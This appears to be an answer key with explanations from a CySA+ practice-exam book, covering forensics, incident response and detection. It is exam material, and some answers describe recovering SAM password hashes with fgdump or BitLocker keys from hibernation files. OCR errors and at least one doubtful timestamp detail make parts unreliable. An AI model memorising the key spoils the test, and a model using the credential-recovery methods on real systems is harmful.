Manager instead of Task Manager (which meets all of her other requirements). Performance 
Monitor is useful for collecting performance data, and iperf is a network performance 
measurement tool. 


D. The chain of custody for evidence is maintained by logging and labeling evidence. This 
ensures that the evidence is properly controlled and accessed. 


A. Roger has memory usage monitoring enabled with thresholds shown at the bottom 
of the chart that will generate an alarm if it continues. The chart shows months of stable 
memory utilization with very little deviation. While a sudden increase could happen, this 
system appears to be functioning well. 


Memory usage is high, however, in a well-tuned system that does not have variable mem- 
ory usage or sudden spikes. This is often an acceptable situation. Windows does not have 
an automated memory management tool that will curtail memory usage in this situation. 


B. The more effort Frank puts into staying up-to-date with information by collecting 
threat information (5), monitoring for indicators (1), and staying up-to-date on security 
alerts (3), the stronger his organization’s security will be. Understanding specific threat 
actors may become relevant if they specifically target organizations like Frank’s, but as a 
midsize organization Frank’s employer is less likely to be specifically targeted directly. 


A. The Windows registry stores a list of wireless networks the system has connected 
to in the registry under HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ 
NetworkList\Profiles. This is not a user-specific setting and is stored for all users in 
LocalMachine. 


B. While it may seem to be a simple answer, ensuring that all input is checked to make 
sure that it is not longer than the variable or buffer it will be placed into is an important 
part of protecting web applications. Canonicalization is useful against scripting attacks. 
Format string attacks occur when input is interpreted as a command by an application. 
Buffer overwriting typically occurs with a circular buffer as data is replaced and is not an 
attack or attack prevention method. 


A. Suspending a virtual machine will result in the RAM and disk contents being stored 
to the directory where it resides. Simply copying that folder is then sufficient to provide 
Susan with all the information she needs. She should not turn the virtual machine off, and 
creating a forensic copy of the drive is not necessary (but she should still validate hashes 
for the copied files or directory). 


A. Chrome stores a broad range of useful forensic information in its SQLite database, 
including cookies, favicons, history, logins, top sites, web form data, and other details. 
Knowing how to write SQL queries or having access to a forensic tool that makes these 
databases easy to access can provide a rich trove of information about the web browsing 
history of a Chrome user. 


B. FTK Imager Light is shown configured to write a single large file that will fail on 
FAT32-formatted drives where the largest single file is 4GB. If Chris needs to create a sin- 
gle file, he should format his destination drive as NTFS. In many cases, he should simply 
create a raw image to a blank disk instead! 
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A. The simplest way to handle a configuration like this is to allow it to be reset when the 
condition is no longer true. If Christina adds the MAC address to her allowed devices list, 
this will automatically remove the alert. If she does not, the alert will remain for proper 
handling. 


B. Modern versions of Windows include the built-in certutil utility. Running 
certutil -hashfile [file location] md5 will calculate the MDS hash of a file. 
certutil also supports SHA1 and SHA256 as well as other less frequently used hashes. 
md5sum and shalsum are Linux utilities, and hashcheck is a shell extension for Windows. 


B. Disclosure based on regulatory or legislative requirements is commonly part of an inci- 
dent response process; however, public feedback is typically a guiding element of infor- 
mation release. Limiting communication to trusted parties and ensuring that data and 
communications about the incident are properly secured are both critical to the security 
of the incident response process. This also means that responders should work to limit the 
potential for accidental release of incident-related information. 


D. A sudden resumption of traffic headed “in” after sitting at zero likely indicates a net- 
work link or route has been repaired. A link failure would show a drop to zero, rather 
than an increase. The complete lack of inbound traffic prior to the resumption at 9:30 
makes it unlikely this is a DDoS, and the internal systems are not sending significant traf- 
fic outbound. 


D. ifconfig, netstat -i,and ip link show will all display a list of the network inter- 
faces for a Linux system. The intf command is made up for this question. 


B. Address Space Layout Randomization (ASLR) is a technique used to prevent buf- 
fer overflows and stack smashing attacks from being able to predict where executable 
code resides in the heap. DEP is Data Execution Protection, and both StackProtect and 
MemShuffle were made up for this question. 


D. The Windows Quick Format option leaves data in unallocated space on the new vol- 
ume, allowing the data to be carved and retrieved. This does not meet the requirements 
for any of the three levels of sanitization defined by NIST. 


C. Angela’s best choice would be to implement IP reputation to monitor for connections 
to known bad hosts. Antivirus definitions, file reputation, and static file analysis are all 
useful for detecting malware, but command-and-control traffic like beaconing will typi- 
cally not match definitions, won’t send known files, and won’t expose files for analysis. 


C. Restoring a system to normal function, including removing it from isolation, is part of 
the containment, eradication, and recovery stage. This may seem to be part of the post- 
incident activity phase, but that phase includes activities such as reporting and process 
updates rather than system restoration. 


A. Flow logs would show Chris outbound traffic flows based on remote IP addresses 

as well as volume of traffic, and behavioral (heuristic) analysis will help him to alert on 
similar behaviors. Chris should build an alert that alarms when servers in his data center 
connect to domains that are not already whitelisted and should strongly consider whether 
servers should be allowed to initiate outbound connections at all! 
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67. B. The NIST recoverability effort categories call a scenario in which time to recovery is 
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predictable with additional resources “supplemented.” The key to the NIST levels is to 
remember that each level of additional unknowns and resources required increases the 
severity level from regular to supplemented and then to extended. A nonrecoverable situ- 
ation exists when the event cannot be remediated, such as when data is exposed. At that 
point, an investigation is launched. In a nongovernment agency, this phase might involve 
escalating to law enforcement. 


C. Using a forensic SIM (which provides some but not all of the files necessary for the 
phone to work); using a dedicated forensic isolation appliance that blocks Wi-Fi, cellular, 
and Bluetooth signals; or even simply putting a device into airplane mode are all valid 
mobile forensic techniques for device isolation. While manipulating the device to put it 
into airplane mode may seem strange to traditional forensic examiners, this is a useful 
technique that can be documented as part of the forensic exercise if allowed by the 
forensic protocols your organization follows. 


B. The audit package can provide this functionality. auditd runs as a service, and then 
auditctl is used to specifically call out the files or directories that will be monitored. 


D. A forensic investigator’s best option is to seize, image, and analyze the drive that Janet 
downloaded the files to. Since she only deleted the files, it is likely that the investigator 
will be able to recover most of the content of the files, allowing them to be identified. 
Network flows do not provide file information, SMB does not log file downloads, browser 
caches will typically not contain a list of all downloaded files, and incognito mode is spe- 
cifically designed to not retain session and cache information. 


B. Joe can choose to isolate the compromised system, either physically or logically, leav- 
ing the attacker with access to the system while isolating it from other systems on his 
network. If he makes a mistake, he could leave his own systems vulnerable, but this will 
allow him to observe the attacker. 


D. NIST SP 800-61 categorizes signs of an incident into two categories, precursors and 
indicators. Precursors are signs that an incident may occur in the future. Since there is not 
an indicator that an event is in progress, this can be categorized as a precursor. Now 
Charles needs to figure out how he will monitor for a potential attack! 


D. Lessons-learned reviews are typically conducted by independent facilitators who ask 
questions like “What happened, and at what time?” and “What information was needed, 
and when?” Lessons-learned reviews are conducted as part of the post-incident activity 
stage of incident response and provide an opportunity for organizations to improve their 
incident response process. 


B. While patching is useful, it won’t stop zero-day threats. If Allan is building a plan spe- 
cifically to deal with zero-day threats, he should focus on designing his network and sys- 
tems to limit the possibility and impact of an unknown vulnerability. That includes using 
threat intelligence, using segmentation, using whitelisting applications, implementing only 
necessary firewall rules, using behavior and baseline-based intrusion prevention rules and 
SIEM alerts, and building a plan in advance! 
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C. NIST describes events with negative consequences as adverse events. It might be 
tempting to immediately call this a security incident; however, this wouldn’t be classified 
that way until an investigation was conducted. If the user accidentally accessed the file, it 
would typically not change classification. Intentional or malicious access would cause the 
adverse event to become a security incident. 


D. Cell phones contain a treasure trove of location data including both tower connection 
log data and GPS location logs in some instances. Photographs taken on mobile devices 
may also include location metadata. Microsoft Office files do not typically include loca- 
tion information. 


Other potential sources of data include car GPS systems if the individual has a car with 
built-in GPS, black-box data-gathering systems, social media posts, and fitness software, 
as well as any other devices that may have built-in GPS or location detection capabilities. 
In some cases, this can be as simple as determining whether the individual’s devices were 
connected to a specific network at a specific time. 


C. Documentation is important when tracking drives to ensure that all drives that should 
be sanitized are being received. Documentation can also provide evidence of proper han- 
dling for audits and internal reviews. 


D. Outsourcing to a third-party incident response provider allows Mike to bring in 
experts when an incident occurs while avoiding the day-to-day expense of hiring a full- 
time staff member. This can make a lot of financial sense if incidents occur rarely, and 
even large organizations bring in third-party response providers when large incidents 
occur. A security operations center (SOC) would be appropriate if Mike needed day- 
to-day security monitoring and operations, and hiring an internal team does not match 
Mike’s funding model limitations in this scenario. 


C. An air gap is a design model that removes connections between network segments or 
other systems. The only way to cross an air gap is to carry devices or data between sys- 
tems or networks, making removable media the threat vector here. 


C. Dan can look up the manufacturer prefix that makes up the first part of the MAC 
address. In this case, Dan will discover that the system is likely a Dell, potentially making 
it easier for him to find the machine in the office. Network management and monitor- 

ing tools like SolarWinds build in this identification capability, making it easier to see if 
unexpected devices show up on the network. Of course, if the local switch is a managed 
switch, he can also query it to determine what port the device is plugged into and follow 
the network cable to it! 


C. NIST identifies three activities for media sanitization: clearing, which uses logi- 

cal techniques to sanitize data in all user-addressable storage locations; purging, which 
applies physical or logical techniques to render data recovery infeasible using state-of- 
the-art laboratory techniques; and destruction, which involves physically destroying the 
media. 


B. Degaussing, which uses a powerful electromagnet to remove data from tape media, is a 
form of purging. 
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A. As long as Brian is comfortable relying on another backup mechanism, he can safely 
disable volume shadow copies and remove the related files. For the drive he is looking at, 
this will result in approximately 26GB of storage becoming available. 


C. Danielle’s best bet to track down the original source of the emails that are being sent is 
to acquire full headers from the spam email. This will allow her to determine whether the 
email is originating from a system on her network or whether the source of the email is 
being spoofed. Once she has headers or if she cannot acquire them, she may want to check 
one or more of the other options on this list for potential issues. 


C. Most portable consumer devices, especially those that generate large files, format 
their storage as FAT32. FAT16 is limited to 2GB partitions, RAW is a photo file format, 
and HFS+ is the native macOS file format. Lauren can expect most devices to format 
media as FAT32 by default because of its broad compatibility across devices and operat- 
ing systems. 


C. The traffic values captured by ifconfig reset at 4Gb of data, making it an unreliable 
means of assessing how much traffic a system has sent when dealing with large volumes of 
traffic. Alex should use an alternate tool designed specifically to monitor traffic levels to 
assess the system’s bandwidth usage. 


C. Brian should determine whether he needs live forensic information, but if he is not 
certain, the safest path for him is to collect live forensic information, take photos so that 
he knows how each system was set up and configured, and then power them down. He 
would then log each system as evidence and will likely create forensic copies of the drives 
once he reaches his forensic work area or may use a portable forensic system to make 
drive images on-site. Powering a running system down can result in the loss of significant 
forensic information, meaning that powering a system down before collecting some infor- 
mation is typically not recommended. Collecting a static image of a drive requires power- 
ing the system down first! 


B. When forensic evidence or information is produced for a civil case, it is called 
e-discovery. This type of discovery often involves massive amounts of data including 
email, files, text messages, and any other electronic evidence that is relevant to the case. 


A. Personally identifiable information (PII) includes information that can be used to iden- 
tify, contact, or locate a specific individual. At times, PIT must be combined with other 
data to accomplish this but remains useful for directly identifying an individual. The data 
that Charles and Linda are classifying is an example of PII. PHI is personal health infor- 
mation. Intellectual property is the creation of human minds including copyrighted works, 
inventions, and other similar properties. PCI-DSS is the Payment Card Industry Data 
Security Standards. 


C. A chain of custody form is used to record each person who works with or is in contact 
with evidence in an investigation. Typically, investigative work is also done in a way that 
fully records all actions taken and sometimes requires two people present to verify actions 
taken. 
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A. Since Scott needs to know more about potential vulnerabilities, an authenticated scan 
from an internal network will provide him with the most information. He will not gain a 
real attacker’s view, but in this case, having more detail is important! 


C. The primary role of management in an incident response effort is to provide the 
authority and resources required to respond appropriately to the incident. They may also 
be asked to make business decisions, communicate with external groups, or assess the 
impact on key stakeholders. 


D. Both auth. log and /etc/passwd may show evidence of the new user, but auth. log 
will provide details, while Chris would need to have knowledge of which users existed 
prior to this new user being added. Chris will get more useful detail by checking 

auth. log. 


C. Process Monitor provides detailed tracking of filesystem and registry changes as well 
as other details that can be useful when determining what changes an application makes 
to a system. This is often used by system administrators as well as forensic and incident 
response professionals, as it can help make tracking down intricate installer problems 
much easier! 


C. NIST does not include making backups of every system and device in its documenta- 
tion. Instead, NIST suggests maintaining an organization-wide knowledge base with 
critical information about systems and applications. Backing up every device and system 
can be prohibitively expensive. Backups are typically done only for specific systems and 
devices, with configuration and restoration data stored for the rest. 


B. NIST identifies four major phases in the IR life cycle: preparation; detection and analy- 
sis; containment, eradication, and recovery; and post-incident activity. Notification and 
communication may occur in multiple phases. 


D. The page file, like many system files, is locked while Windows is running. Charles sim- 
ply needs to shut down the system and copy the page file. Some Windows systems may be 

set to purge the page file when the system is shut down, so he may need to pull the plug to 
get an intact page file. 


B. Checking the SSID won’t help since an evil twin specifically clones the SSID of a legiti- 
mate AP. Evil twins can be identified by checking their BSSID (the wireless MAC address). 
If the wireless MAC has been cloned, checking additional attributes such as the channel, 
cipher, or authentication method can help identify them. In many cases, they can also be 
identified using the organizational unique identifier (OUI) that is sent as a tagged param- 
eter in beacon frames. 


C. Slack space is leftover storage that exists because files do not take up the entire space 
allocated for them. Since the Unallocated partition does not have a filesystem on it, space 
there should not be considered slack space. Both System Reserved and C: are formatted 
with NTFS and will have slack space between files. 


C. Luke should expect to find most of the settings he is looking for contained in plists, or 
property lists, which are XML files encoded in a binary format. 
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C. Without other requirements in place, many organizations select a one- to two-year 
retention period. This allows enough time to use existing information for investigations 
but does not retain so much data that it cannot be managed. Regardless of the time period 
selected, organizations should set and consistently follow a retention policy. 


C. If Alice focuses on a quick restoration, she is unlikely to preserve all of the evidence 
she would be able to during a longer incident response process. Since she is focusing on 
quick restoration, the service should be available more quickly, and the service and sys- 
tem should not be damaged in any significant way by the restoration process. The time 
required to implement the strategy will typically be less if she does not conduct a full 
forensic investigation and instead focuses on service restoration. 


D. Criminal investigations can take very long periods of time to resolve. In most cases, 
Joe should ensure that he can continue to operate without the servers for the foreseeable 
future. 


C. A RAW image, like those created by dd, is Lauren’s best option for broad compat- 
ibility. Many forensic tools support multiple image formats, but RAW files are supported 
almost universally by forensic tools. 


D. Windows systems record new device connections in the security audit log if configured 
to do so. In addition, information is collected in both the setupapi log file and in the reg- 
istry, including information on the device, its serial number, and often manufacturer and 
model details. The user’s profile does not include device information. 


B. When a network share or mounted drive is captured from the system that mounts it, 
data like deleted files, unallocated space, and other information that requires direct drive 
access will not be captured. If Scott needs that information, he will need to create a foren- 
sic image of the drive from the host server. 


D. NIST identifies customers, constituents, media, other incident response teams, Internet 
service providers, incident reporters, law enforcement agencies, and software and support 
vendors as outside parties that an IR team will communicate with. 


B. Questions including what tools and resources are needed to detect, analyze, or mitigate 
figure incidents, as well as topics such as how information sharing could be improved, 
what could be done better or differently, and how effective existing processes and policies 
are, can all be part of the lessons-learned review. 


B. The order of volatility for common storage locations is as follows: 
1. CPU cache, registers, running processes, RAM 
2. Network traffic 
3. Disk drives 
4. Backups, printouts, optical media 
C. Removing a system from the network typically occurs as part of the containment 


phase of an incident response process. Systems are typically not returned to the network 
until the end of the recovery phase. 
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D. MDS, SHA-1, and SHA-2 hashes are all considered forensically sound. While MDS 
hashes are no longer a secure means of hashing, they are still considered appropriate for 
validation of forensic images because it is unlikely that an attacker would intentionally 
create a hash collision to falsify the forensic integrity of a drive. 


D. NIST’s Computer Security Incident Handling Guide notes that identifying an attacker 
can be “time-consuming and futile.” In general, spending time identifying attackers is not 
a valuable use of incident response time for most organizations. 


B. The ability to create a timeline of events that covers logs, file changes, and many other 
artifacts is known as a Super Timeline. SIFT includes this capability, allowing Rick to 
decide what event types and modules he wants to enable as part of his timeline-based view 
of events. 


B. It is unlikely that skilled attackers will create a new home directory for an account 
they want to hide. Checking /etc/password and /etc/shadow for new accounts is a 
quick way to detect unexpected accounts, and checking both the sudoers and membership 
in wheel and other high privilege groups can help Charles detect unexpected accounts 
with increased privileges. 


A. Information Sharing and Analysis Centers (ISACs) are information sharing and com- 
munity support organizations that work within vertical industries like energy, higher 
education, and other business domains. Ben may choose to have his organization join an 
ISAC to share and obtain information about threats and activities that are particularly rel- 
evant to what his organization does. A CSIRT is a Computer Security Incident Response 
Team and tends to be hosted in a single organization, a VPAC is made up, and an IRT is 
an incident response team. 


C. Headers can be helpful when tracking down spam email, but spammers often use a 
number of methods to obfuscate the original sender’s IP address, email, or other details. 
Unfortunately, email addresses are often spoofed, and the email address may be falsified. 
In this case, the only verifiable information in these headers is the IP address of the origi- 
nating host, mf-smf-ucb011.0cn.ad.jp (mf-smf-ucb011.0cn.ad.jp) [153.149.228.228]. At 
times even this detail can be forged, but in most cases, this is simply a compromised host 
or one with an open email application that spammers can leverage to send bulk email. 


C. The keychain in macOS stores user credentials but does not store user account pass- 
words. All of the other options listed are possible solutions for Lauren, but none of them 
will work if the system has FileVault turned on. 


C. iPhone backups to local systems can be full or differential, and in this scenario the 
most likely issue is that Cynthia has recovered a differential backup. She should look for 
additional backup files if she does not have access to the original phone. If the backup was 
encrypted, she would not be able to access it without a cracking tool, and if it was inter- 
rupted, she would be unlikely to have the backup file or have it be in usable condition. 
iCloud backups require access to the user’s computer or account and are less likely to be 
part of a forensic investigation. 
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A. A second forensic examiner who acts as a witness, countersigning all documenta- 
tion and helping document all actions, provides both strong documentation and another 
potential witness in court. Independent forensic action, no matter how well documented, 
will not be as reliable as having a witness. 


B. While it may seem obvious that the system should be isolated from the network when 
it is rebuilt, we have seen this exact scenario played out before. In one instance, the system 
was recompromised twice before the system administrator learned their lesson! 


D. MBR-, UEFI-, and BIOS-resident malware packages can all survive a drive wipe, but 
hiding files in slack space will not survive a zero wipe. While these techniques are uncom- 
mon, they do exist and have been seen in the wild. 


D. Patents, copyrights, trademarks, and trade secrets are all forms of intellectual prop- 
erty. Patents, copyrights, and trademarks are all legal creations to support creators, while 
trade secrets are proprietary business information and are not formally protected by 
governments. 


B. BYOD, or bring your own device, is increasingly common, and administrators typi- 
cally find that network utilization, support tickets, and security risk (because of miscon- 
figured, unpatched, or improperly secured devices) increase. Most organizations do not 
experience additional device costs with BYOD, as users are providing their own devices. 


A. The space that Saria sees is the space between the end of the file and the space allo- 
cated per cluster or block. This space may contain remnants of previous files written to 
the cluster or block or may simply contain random data from when the disk was format- 
ted or initialized. 


C. The U.S. National Archives General Records Schedule stipulates a three-year records 
retention period for incident-handling records. 


A. Trusted system binary kits like those provided by the National Software Reference 
Library include known good hashes of many operating systems and applications. Kathleen 
can validate the files on her system using references like the NSRL (https: //www.nsrl 
.nist.gov/new.htmlL). 


A. Pluggable authentication module (PAM)-aware applications have a file in the /etc/ 
pam.d directory. These files list directives that define the module and what settings or con- 
trols are enabled. Charles should ensure that the multifactor authentication system he uses 
is configured as required in the PAM files for the services he is reviewing. 


B. NIST specifically recommends the hostname, MAC addresses, and IP addresses of the 
system. Capturing the full output of an ipconfig or ifconfig command may be useful, 
but forensic analysis may not permit interaction with a live machine. Additional detail like 
the domain (or domain membership) may or may not be available for any given machine, 
and NIC manufacturer and similar data is not necessary under most circumstances. 
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D. Since most APTs (including this one, as specified in the question) send traffic in an 
encrypted form, performing network forensics or traffic analysis will only provide infor- 
mation about potentially infected hosts. If Chris wants to find the actual tools that may 
exist on endpoint systems, he should conduct endpoint forensics. Along the way, he may 
use endpoint behavior analysis, network forensics, and network traffic analysis to help 
identify target systems. 


B. Each antivirus or anti-malware vendor uses their own name for malware, resulting in 
a variety of names showing for a given malware package or family. In this case, the mal- 
ware package is a ransomware package; that is known by some vendors as GoldenEye or 
Petya. 


B. When a system is not a critical business asset that must remain online, the best 
response is typically to isolate it from other systems and networks that it could negatively 
impact. By disconnecting it from all networks, Ben can safely investigate the issue without 
causing undue risk. 


We have actually encountered this situation. After investigating, we found that the user’s 
text-to-speech application was enabled, and the microphone had the gain turned all the 
way up. The system was automatically typing words based on how it interpreted back- 
ground noise, resulting in strange text that really terrified the unsuspecting user. 


C. When clusters are overwritten, original data is left in the unused space between the 
end of the new file and the end of the cluster. This means that copying new files over old 
files can leave remnant data that may help Kathleen prove that the files were on the system 
by examining slack space. 


C. The command line for snmpwalk provides the clues you need. The -c flag specifies a 

community string to use, and the -v flag specifies the SNMP version. Since we know the 
community string, you can presume that the contact ID is root rather than the commu- 
nity string. 


C. The built-in macOS utility for measuring memory, CPU, disk, network, and power 
usage is Activity Monitor. Windows uses Resource Monitor, Sysradar was made up for 
this question, and System Monitor is used to collect information from Microsoft’s SQL 
Server via RPC. 


A. Ifthe system that Angela is attempting to access had mounted the encrypted vol- 
ume before going to sleep and there is a hibernation file, Angela can use hibernation file 
analysis tools to retrieve the BitLocker key. If the system did not hibernate or the volume 
was not mounted when the system went to sleep, she will not be able to retrieve the keys. 
Memory analysis won’t work with a system that is off, the boot sector does not contain 
keys, and brute-force cracking is not a viable method of cracking BitLocker keys because 
of the time involved. 


C. The pseudocode tells you that Adam is trying to detect outbound packets that are 
part of short communications (less than 10 packets and less than 3,000 bytes) and that 
he believes the traffic may appear to be web traffic, be general TCP traffic, or not match 
known traffic types. He also is making sure that general web traffic won’t be captured by 
not matching on uripath and contentencoding. 
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B. Services are often started by xinetd (although newer versions of some distributions 
now use systemctl). Both /etc/passwd and /etc/shadow are associated with user 
accounts, and $HOME/.ssh/ contains SSH keys and other details for SSH-based logins. 


B. NIST classifies changes or deletion of sensitive or proprietary information as an integ- 
rity loss. Proprietary breaches occur when unclassified proprietary information is accessed 
or exfiltrated, and privacy breaches involve personally identifiable information (PII) that is 
accessed or exfiltrated. 


C. While responders are working to contain the incident, they should also reserve forensic 
and incident information for future analysis. Restoration of service is often prioritized 
over analysis during containment activities, but taking the time to create forensic images 
and to preserve log and other data is important for later investigation. 


C. The system Susan is reviewing only has login failure logging turned on and will not 
capture successful logins. She cannot rely on the logs to show her who logged in but may 
be able to find other forensic indicators of activity, including changes in the user profile 
directories and application caches. 


A. The only true statement based on the image is that there are two remote users ssh’ed 
into the system. Port 9898 is registered with IANA as Monkeycom but is often used for 
Tripwire, leading to incorrect identification of the service. The local system is part of the 
example.com domain, and the command that was run will not show any UDP services 
because of the -at flag, meaning that you cannot verify if any UDP services are running. 


A. Windows does not include a built-in secure erase tool in the GUI or at the command 
line. Using a third-party program like Eraser or a bootable tool like DBAN is a reasonable 
option, and encrypting the entire drive and then deleting the key will have the same effect. 


D. The CySA+ exam objectives specifically identify data including merger and acquisition 
information as well as accounting data. This data is obviously not personally identifiable 
information or personal health information, and corporate confidential data describes it 
more accurately based on the exam objectives than intellectual property. 


C. Postmortem forensics can typically be done after shutting down systems to ensure that 
a complete forensic copy is made. Live forensics imaging can help to capture memory- 
resident malware. It can also aid in the capture of encrypted drives and filesystems when 
they are decrypted for live usage. Finally, unsupported filesystems can sometimes be 
imaged while the system is booted by copying data off the system to a supported filesystem 
type. This won’t retain some filesystem-specific data but can allow key forensic activities 
to take place. 


D. There is no common standard for determining the age of a user account in Linux. 
Some organizations add a comment to user accounts using the -c flag for user creation to 
note when they are created. Using the ls command with the -ld flag will show the date of 
file creation, which may indicate when a user account was created if a home directory was 
created for the user at account creation, but this is not a requirement. The aureport com- 
mand is useful if auditd is in use, but that is not consistent between Linux distros. 
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B. Profiling networks and systems will provide a baseline behavior set. A SIEM or similar 
system can monitor for differences or anomalies that are recorded as events. Once corre- 
lated with other events, these can be investigated and may prove to be security incidents. 
Dynamic and static analysis are types of code analysis, while behavioral, or heuristic, 
analysis focuses on behaviors that are indicative of an attack or other undesirable behav- 
ior. Behavioral analysis does not require a baseline; instead, it requires knowing what 
behavior is not acceptable. 


C. A system restore should not be used to rebuild a system after an infection or compro- 
mise since it restores only Windows system files, some program files, registry settings, 
and hardware drivers. This means that personal files and most malware, as well as pro- 
grams installed or modifications to programs after the restore point is created, will not be 
restored. 


B. Portable imaging tools like FTK Imager Lite can be run from removable media, allow- 
ing a live image to be captured. Ben may still want to capture the system memory as well, 
but when systems are used for data gathering and egress, the contents of the disk will be 
important. Installing a tool or taking the system offline and mounting the drive are both 
undesirable in this type of scenario when the system must stay online and should not be 


modified. 


C. The File System audit subcategory includes the ability to monitor for both access to 
objects (event ID 4663) and permission changes (event ID 4670). Charles will probably 
be most interested in 4670 permission change events, as 4663 events include read, write, 
delete, and other occurrences and can be quite noisy! 


B. If Charles has good reason to believe he is the only person with root access to the sys- 
tem, he should look for a privilege escalation attack. A remote access Trojan would not 
directly provide root access, and a hacked root account is less likely than a privilege esca- 
lation attack. A malware infection is possible, and privilege escalation would be required 
to take the actions shown. 


B. NIST describes brute-force methods used to degrade networks or services as a form 
of attrition in their threat classification scheme. It may be tempting to call this improper 
usage, and it is; however, once an employee has been terminated, it is no longer an insider 
attack, even if the employee retains access. 


C. The original creation date (as shown by the GPS time), the device type (a Nexus 6P), 
the GPS location, and the manufacturer of the device (Huawei) can all provide useful 
forensic information. Here, you know when the photo was taken, where it was taken, 
and what type of device it was taken on. This can help narrow down who took the 
photo or may provide other useful clues when combined with other forensic information 
or theories. 


B. A jump kit is a common part of an incident response plan and provides responders 
with the tools they will need without having to worry about where key pieces of equip- 
ment are during a stressful time. Crash carts are often used in data centers to connect a 
keyboard, mouse, and monitor to a server to work on it. First-responder kits are typically 
associated with medical responders, and a grab bag contains random items! 
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B. Chrome uses the number of seconds since midnight on January 1, 1601, for its time- 
stamps. This is similar to the file time used by Microsoft in some locations, although the 
file time records time in 100 nanosecond slices instead of seconds. Since the problem did 
not specify an operating system and Chrome is broadly available for multiple platforms, 
you'll likely have recognized that this is unlikely to be a Microsoft timestamp. ISO 8601 is 
written in a format like this: 2017-04-02T04:01:34+00:00. 


B. While it may seem like an obvious answer, Microsoft’s MBSA is now outdated and 
does not fully support Windows 10. Cynthia should select one of the other options listed 
to ensure that she gets a complete report. 


D. Facebook, as well as many other social media sites, now strip image metadata to help 
protect user privacy. John would need to locate copies of the photos that have not had the 
metadata removed and may still find that they did not contain additional useful data. 


D. The U.S. Department of Health and Human Services defines PHI data elements to 
include all “individually identifiable health information,” including an individual’s physi- 
cal or mental health and their payment for healthcare in the past, present, future; their 
identity or information that could be used to identify an individual; and the data about 
the provision of healthcare to individuals. It does not include educational records. 


A. FISMA requires that U.S. federal agencies report incidents to US-CERT. CERT/CC is 
the coordination center of the Software Engineering Institute and researches software and 
Internet security flaws as well as works to improve software and Internet security. The 
National Cyber Security Authority is Israel’s CERT, while the National Cyber Security 
Centre is the UK’s CERT. 


C. The order of volatility for media from least to most volatile is often listed as back- 
ups and printouts; then disk drives like hard drives and SSDs; then virtual memory; and 
finally CPU cache, registers, and RAM. Artifacts stored in each of these locations can 

be associated with the level of volatility of that storage mechanism. For example, rout- 
ing tables will typically be stored in RAM, making them highly volatile. Data stored on 
a rewriteable media is always considered more volatile than media stored on a write-only 
media. 


B. The SAM is stored in C: \Windows\System32\config but is not accessible while the 
system is booted. The hashed passwords are also stored in the registry at HKEY_LOCAL_ 
MACHINE\SAM but are also protected while the system is booted. The best way to recover 
the SAM is by booting off of removable media or using a tool like fgdump. 


A. Modern Microsoft Office files are actually stored in a .zip format. Alex will need to 
open them using a utility that can unzip them before he can manually review their con- 
tents. He may want to use a dedicated Microsoft Office forensics tool or a forensics suite 
with built-in support for Office documents. 


B. Memory pressure is a macOS-specific term used to describe the availability of memory 
resources. Yellow segments on a memory pressure chart indicate that memory resources 
are still available but are being tasked by memory management processes such as compres- 
sion. 
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D. Once a command prompt window has been closed on a Windows system, the com- 
mand history is erased. If Lucas could catch the user with an open command prompt, he 
could hit F7 and see the command history. 


C. Wireless evil twin attacks use a rogue AP configured to spoof the MAC address of a 
legitimate access point. The device is then configured to provide what looks like a legiti- 
mate login page to capture user credentials, allowing attackers to use those credentials to 
access other organizational resources. 


D. The program netcat is typically run using nc. The -k flag for netcat makes it listen 
continuously rather than terminating after a client disconnects, and -l determines the 
port that it is listening on. In this case, the netcat server is listening on TCP port 6667, 
which is typically associated with IRC. 


D. Economic impact is calculated on a relative scale, and Angela does not have all of the 
information she needs. A $500,000 loss may be catastrophic for a small organization and 
may have a far lower impact to a Fortune 500 company. Other factors like cybersecurity 
insurance may also limit the economic impact of a cybersecurity incident. 


D. Chris simply needs to generate a known event ID that he can uniquely verify. Once he 
does, he can log into the SIEM and search for that event at the time he generated it to vali- 
date that his system is sending syslogs. 


C. Windows includes a built-in memory protection scheme called DEP that prevents code 
from being run in pages that are marked as nonexecutable. By default, DEP only protects 
“essential Windows programs and services,” but it can be enabled for all programs and 
services, can be enabled for all programs and services except those that are on an excep- 
tion list, or can be entirely disabled. 


B. The NIST guidelines require validation after clearing, purging, or destroying media to 
ensure that the action that was taken is effective. This is an important step since improp- 
erly applying the sanitization process and leaving data partially or even fully intact can 
lead to a data breach! 


C. In this case, with current payroll and financial data encrypted and payroll unable to be 
run, this should be categorized as a high-severity incident. 


B. Tamper-proof seals are used when it is necessary to prove that devices, systems, or 
spaces were not accessed. They often include holographic logos that help to ensure that 
tampering is both visible and cannot be easily hidden by replacing the sticker. A chain of 
custody log works only if personnel actively use it, and system logs will not show physical 
access. If Lauren has strong concerns, she may also want to ensure that the room or space 
is physically secured and monitored using a camera system. 


C. Collecting and analyzing logs most often occurs in the detection phase, while con- 
necting attacks back to attackers is typically handled in the containment, eradication, and 
recovery phase of the NIST incident response process. 
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B. Angela has performed interactive behavior analysis. This process involves executing a 
file in a fully instrumented environment and then tracking what occurs. Angela’s ability to 
interact with the file is part of the interactive element and allows her to simulate normal 
user interactions as needed or to provide the malware with an environment where it can 
interact like it would in the wild. 


C. If Ben has ensured that his destination media is large enough to contain the image, 
then a failure to copy is most likely because of bad media. Modification of the source data 
will result in a hash mismatch, encrypted drives can be imaged successfully despite being 
encrypted (the imager doesn’t care!), and copying in RAW format is simply a bit-by-bit 
copy and will not cause a failure. 


A. Derek has created a malware analysis sandbox and may opt to use tools like Cuckoo, 
Truman, Minibis, or a commercial analysis tool. If he pulls apart the files to analyze how 
they work, he would be engaging in reverse engineering, and doing code-level analysis of 
executable malware would require disassembly. Darknets are used to identify malicious 
traffic and aren’t used in this way. 


A. Failed SSH logins are common, either because of a user who has mistyped their pass- 
word or because of scans and random connection attempts. Chris should review his SSH 
logs to see what may have occurred. 


B. By default, Run and RunOnce keys are ignored when Windows systems are booted 
into Safe Mode. Clever attackers may insert an asterisk to force the program to run in 
Safe Mode; however, this is not a common tactic. 


B. The setupapi file (C: \Windows\INF\setupapi.dev. log) records the first time a USB 
device is connected to a Windows system using the local system’s time. Other device infor- 
mation is collected in the registry, and the system security log may contain connection 
information if USB device logging is specifically enabled. 


C. The only solution from Lauren’s list that might work is to capture network flows, 
remove normal traffic, and then analyze what is left. The Storm botnet and other peer-to- 
peer botnets use rapidly changing control nodes and don’t rely on a consistent, identifiable 
control infrastructure, which means that traditional methods of detecting beaconing will 
typically fail. They also use quickly changing infection packages, making signature-based 
detection unlikely to work. Finally, building a network traffic baseline after an infection 
will typically make the infection part of the baseline, resulting in failure to detect mali- 
cious traffic. 


